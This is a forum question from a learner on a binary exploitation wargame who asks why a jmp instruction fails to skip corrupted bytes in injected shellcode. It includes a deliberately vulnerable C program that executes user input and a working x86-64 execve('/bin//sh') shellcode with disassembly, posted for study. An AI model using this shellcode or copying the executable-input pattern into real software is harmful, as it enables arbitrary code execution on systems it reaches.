# Wargames RET2 Systems Shellcoding - Trouble using ```jmp``` instruction to connect parts of shellcode

Tags: shellcode

I am doing the RET2 Systems Binary Exploitation course Wargames (https://wargames.ret2.systems/) and am working on the shellcoding chapter. I am learning about how to use `jmp` assembly instructions to connect sections of shell code. When shell code is injected into a running program, the program may corrupt bytes. `jmp` instructions are meant to bridge over those corrupt parts.

This is the C program I am working with:

```
// gcc -g -I ../includes -O0 -z execstack -fno-stack-protector -no-pie -o splits splits.c
#include <stdio.h>
#include <string.h>

// Hidden for simplicty
#include <wargames.h>

void main()
{
    init_wargame();

    printf("------------------------------------------------------------\n");
    printf("--[ Shellcode - Constrained Shellcode                       \n");
    printf("------------------------------------------------------------\n");

    // Buffer to hold user input & shellcode
    char buffer[32] = {};
    char shellcode[32] = {};   
    
    // Oftentimes shellcode will enter a process as string
    printf("Enter a string: ");
    fgets(buffer, sizeof(buffer), stdin);

    // Constrain shellcode to be NULL-free
    strncpy(shellcode, buffer, sizeof(shellcode));
    memset(buffer, 0, sizeof(buffer));  
    
    // Stomp over some shellcode (added constraints)
    shellcode[16] = '\xff';
    shellcode[17] = '\xe3';
    shellcode[18] = '\xff';
    shellcode[19] = '\xe7';

    printf("Calling further constrained shellcode...\n");
    ((void (*)(void))shellcode)();
}
```

And this is the original assembly code:

```
Raw Bytes:
31F648BB2F62696E2F2F73685653545F6A3B5831D20F05

Python Escaped:
"\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x56\x53\x54\x5F\x6A\x3B\x58\x31\xD2\x0F\x05"

Disassembly:
0:  31 f6                   xor    esi,esi
2:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
9:  2f 73 68
c:  56                      push   rsi
d:  53                      push   rbx
e:  54                      push   rsp
f:  5f                      pop    rdi
10: 6a 3b                   push   0x3b
12: 58                      pop    rax
13: 31 d2                   xor    edx,edx
15: 0f 05                   syscall
```

I am trying to figure out how to use the `jmp` instruction to bridge the corrupted parts. The following is what I have tried. I thought it would work because the instruction and the offset will be executed before the corruption begins (the execution of `jmp $+7` starts at 0xe and I believe it will be executed before the corruption begins at 0x10). As you can see, I also deleted the 0xf line (`pop rdi`) - otherwise, the syscall would have gotten pushed back to 0x16. Additionally, as I understand it, "+7" would be a suitable amount of bytes to offset (because 0x15 - 0xe = 21 - 14 = 7).

```
Raw Bytes:
31F648BB2F62696E2F2F73685653EB056A3B5831D20F05

Python Escaped:
"\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x56\x53\xEB\x05\x6A\x3B\x58\x31\xD2\x0F\x05"

Disassembly:
0:  31 f6                   xor    esi,esi
2:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
9:  2f 73 68
c:  56                      push   rsi
d:  53                      push   rbx
e:  eb 05                   jmp    15 <_main+0x15>
10: 6a 3b                   push   0x3b
12: 58                      pop    rax
13: 31 d2                   xor    edx,edx
15: 0f 05                   syscall
```

I have been wracking my brain and trying different offsets, and placing `jmp` at different locations but with no luck unfortunately. Ideally, I would still like to figure this level out by myself. I am mainly curious right now about where my misunderstanding about `jmp` instructions lies. Can someone help point this out to me?